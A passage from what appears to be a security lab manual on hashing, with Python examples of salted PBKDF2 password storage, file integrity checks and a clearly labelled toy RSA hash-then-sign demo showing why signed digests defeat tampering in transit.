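import hmac
import os
import tempfile


def digest_hex(algorithm, data):
    """Hex digest of data under the named algorithm (e.g. 'md5', 'sha1', 'sha256')."""
    return hashlib.new(algorithm, data).hexdigest()


def fixed_length_and_avalanche():
    """Property 1: the digest length never changes with input size; property 2: changing
    one letter gives an unrelated digest. SHA-256 here (64 hex chars); the text's
    32-character examples are MD5 digests."""
    short = digest_hex("sha256", b"the quick")
    huge = digest_hex("sha256", b"the quick " * 10_000)
    changed = digest_hex("sha256", b"the quikk")
    return len(short) == len(huge) == 64, short != changed


PBKDF2_ITERATIONS = 600_000   # assumed; tune to the login server's hardware


def make_password_record(password):
    """What goes into the password file: algorithm, iterations, salt and derived key.
    The salt makes equal passwords hash differently and defeats precomputed tables."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "$".join(["pbkdf2_sha256", str(PBKDF2_ITERATIONS),
                     base64.b64encode(salt).decode(), base64.b64encode(dk).decode()])


def verify_password(record, candidate):
    """Login check: re-derive from the stored salt and compare in constant time."""
    _algo, iterations, salt_b64, dk_b64 = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                             base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))


def file_digest(path, algorithm="sha256"):
    """Stream a file through the hash so large downloads need no extra memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def integrity_ok(path, published_digest, algorithm="sha256"):
    """Client side of the integrity check: recompute and compare with the server's value."""
    return hmac.compare_digest(file_digest(path, algorithm), published_digest)


def demo_integrity_check():
    """Server publishes a digest; the client checks the intact file, then the altered one."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "download.bin")
        with open(path, "wb") as f:
            f.write(b"constructed document contents\n" * 1000)
        published = file_digest(path)               # computed by the server before sending
        before = integrity_ok(path, published)      # client check on the unmodified file
        with open(path, "ab") as f:
            f.write(b"x")                           # simulated alteration in transit
        after = integrity_ok(path, published)
    return before, after
```

Two details matter beyond what the text says: the comparison uses hmac.compare_digest so that timing does not leak how many leading bytes matched, and the password derivation is deliberately slow, which is exactly the opposite of the "must be efficient" property wanted from a general-purpose hash and the reason password storage uses a dedicated construction.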

Digital signatures

Most data integrity checks are only carried out by the client. When a file is downloaded, it's usually already accompanied by the file's hash, a.k.a. message digest. The client then generates its own hash from the file it downloaded and compares it with the message digest that came along with the download. This method has a flaw. What's to stop an attacker from intercepting the file, altering it, generating its own message digest using the same hash function, and then forwarding the altered file (along with the new message digest) to the client? Once the client receives the downloaded file and compares its locally-generated hash with the downloaded hash, they will naturally appear equal. No way will this qualify for a HIPAA compliant file transfer. It's therefore important for the client to make sure that both the downloaded file and the downloaded hash came from the original source. This can be done using asymmetric encryption keys. Assuming the client has the corresponding public key, the server can generate a "digital signature" using its private key and the message digest. It’s this digital signature that will then be sent together with the file. So, when the client receives them, it can then use the public key to verify the authenticity of the signature and retrieve the message digest. Only then can the client compare the message digest with its locally-generated hash of the file.

A failure to authenticate could only mean that the private key that was used to generate the digital signature is not the pair of the public key used by the client. Digital signatures are common in SSL-secured protocols like FTPS.
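The flaw and its fix from this section, as an added Python example that is not part of the lab manual: digest_only_check() is the check an attacker can satisfy by recomputing the digest, signed_check() is the hash-then-sign version in which the client recovers the digest from a signature only the server's private key could produce. The signature scheme is textbook RSA over a truncated SHA-256 digest with a toy Mersenne-prime modulus, chosen so it runs on the standard library; real code uses RSA-PSS or Ed25519 from a vetted library. The key values, file contents and the interception scenario are constructed for this demo.

```python
"""Hash-then-sign: catching a download whose digest was replaced along with the file.

Added example, not the lab manual's code. Toy RSA parameters, for illustration only.
"""
import hashlib

# Constructed server key pair (assumed): modulus of about 2^150, public exponent 65537.
_P, _Q = 2**61 - 1, 2**89 - 1
N = _P * _Q
E = 65537                                   # client holds (N, E)
D = pow(E, -1, (_P - 1) * (_Q - 1))         # server alone holds D


def digest_as_int(data):
    """SHA-256 of the data, truncated to 128 bits so that it fits under the toy modulus."""
    return int.from_bytes(hashlib.sha256(data).digest()[:16], "big")


def sign(data, private_d=D, n=N):
    """Server: sign the message digest with the private key and ship it with the file."""
    return pow(digest_as_int(data), private_d, n)


def recover_digest(signature, public_e=E, n=N):
    """Client: apply the public key to retrieve the digest the server actually signed."""
    return pow(signature, public_e, n)


def digest_only_check(file_bytes, received_digest):
    """The flawed check: the digest travelled unprotected, so whoever altered the file
    could recompute it."""
    return hashlib.sha256(file_bytes).digest() == received_digest


def signed_check(file_bytes, signature):
    """The fixed check: compare the locally computed digest with the one recovered from
    the signature. Only a party holding D could have produced a matching signature."""
    return recover_digest(signature) == digest_as_int(file_bytes)


def demo():
    """Intercept-and-alter scenario: the attacker can recompute the digest but cannot re-sign."""
    original = b"quarterly-report.pdf (constructed contents)"
    signature = sign(original)
    tampered = original + b" -- altered in transit"
    attacker_digest = hashlib.sha256(tampered).digest()
    return {
        "digest_only_accepts_tampered": digest_only_check(tampered, attacker_digest),
        "signature_accepts_original": signed_check(original, signature),
        "signature_accepts_tampered": signed_check(tampered, signature),
    }


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the digest-only check accepting the altered file while the signed check rejects it, which is the failure-to-authenticate case the text describes: the recovered digest no longer matches because the signature was made over the original file by the holder of D, and no other party can make one that the server's public key accepts.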

Conclusion: Hence we have successfully studied and understood hashing.
